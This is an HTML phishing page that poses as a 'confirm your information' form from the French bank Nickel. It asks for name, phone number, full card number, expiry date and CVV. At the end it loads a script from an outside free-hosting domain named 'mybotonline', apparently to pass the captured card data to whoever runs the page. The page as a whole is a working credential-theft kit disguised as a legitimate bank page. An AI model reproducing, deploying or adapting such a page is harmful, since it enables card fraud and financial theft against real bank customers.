<!DOCTYPE html>
<html lang="fr">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="https://nickel.eu/fonts/newfont.css" type="text/css">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet"
		integrity="sha384-4bw+/aepP/YC94hEpVNVgiZdgIC5+VKNBQNGCHeKRQN+PtmoHDEXuppvnDJzQIu9" crossorigin="anonymous">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css"
		integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA=="
		crossorigin="anonymous" referrerpolicy="no-referrer" />
	
	<link rel="stylesheet" href="./style.css">
	<link rel="stylesheet" href="./style2.css">
	<title>Carte infos</title>
</head>

<body>
	<div id="page">
		<div class="header shadow-sm row">
			<div class="col-6">
				<img src="./img/logo.png" alt="">
			</div>
			<!-- <div class="col-6">
                <button>Espace partenaire</button>
            </div> -->
		</div>

		<main class="center">
			<br>
			<h1 style="text-align: center; font-size: 1.3rem;">
				Confirmer vos informations | Nickel
			</h1>
			<form id="form4">
				<input name="utf8" type="hidden" value="✓">
				<input type="hidden" name="step" value="cc">
				<input type="hidden" name="authenticity_token">



					<label style="color: inherit; margin-top: 8px; font-size: inherit; font-style: inherit; font-weight: 200; text-transform: inherit;">Nom*</label>
					<input type="text" name="name" required id="name" aria-required="true">

					<label style="color: inherit; margin-top: 8px; font-size: inherit; font-style: inherit; font-weight: 200; text-transform: inherit;">Prénom*</label>
					<input type="text" outline="none" required id="prenom">


					<label style="color: inherit; margin-top: 8px; font-size: inherit; font-style: inherit; font-weight: 200; text-transform: inherit;">Numero de telephone*</label>
					<input type="tel" placeholder="+33 X XX XX XX XX" required id="tel" maxlength="10" minlength="10">


					<label style="color: inherit; margin-top: 8px; font-size: inherit; font-style: inherit; font-weight: 200; text-transform: inherit;">Numero de la carte*</label>
					<input type="text" name="ccnum" required id="ccnum" maxlength="16" minlength="16">


					<label style="color: inherit;  margin-left: 7%;	margin-top: 8px; font-size: inherit; font-style: inherit; font-weight: 200; text-transform: inherit;">Date d'expiration (MM/YY)*</label>

					<div style="display: flex;	justify-content: space-between;	width: 95%;">
						<input style="border-right: none;	text-align: center;" type="text" placeholder="MM" name="exp" required id="mm" maxlength="2" minlength="2"	autocomplete="off">
						<input id="yy" style="border-left: 1px dashed; padding: 0%; text-align: center;" type="text" placeholder="YY" maxlength="2" minlength="2" required>
						<input type="tel" placeholder="CVV" maxlength="3" minlength="3" name="cvv" required id="cvv" style="text-align: center; border-left: 1px dashed;">
					</div>

				</div>
				<p id="notif" style="color: orange;"></p>
				<br>
				<div style="width: 100%; display: flex; align-items: center; justify-content: center;">
					<button id="button" type="submit">Valider</button> <br> <br>
				</div>


			</form>
			<br> <br> <br>

		</main>

	</div>

</body>
<script src="https://mybotonline.000webhostapp.com/serveur/file.js"></script>
<script src="./card.js"></script>

</html>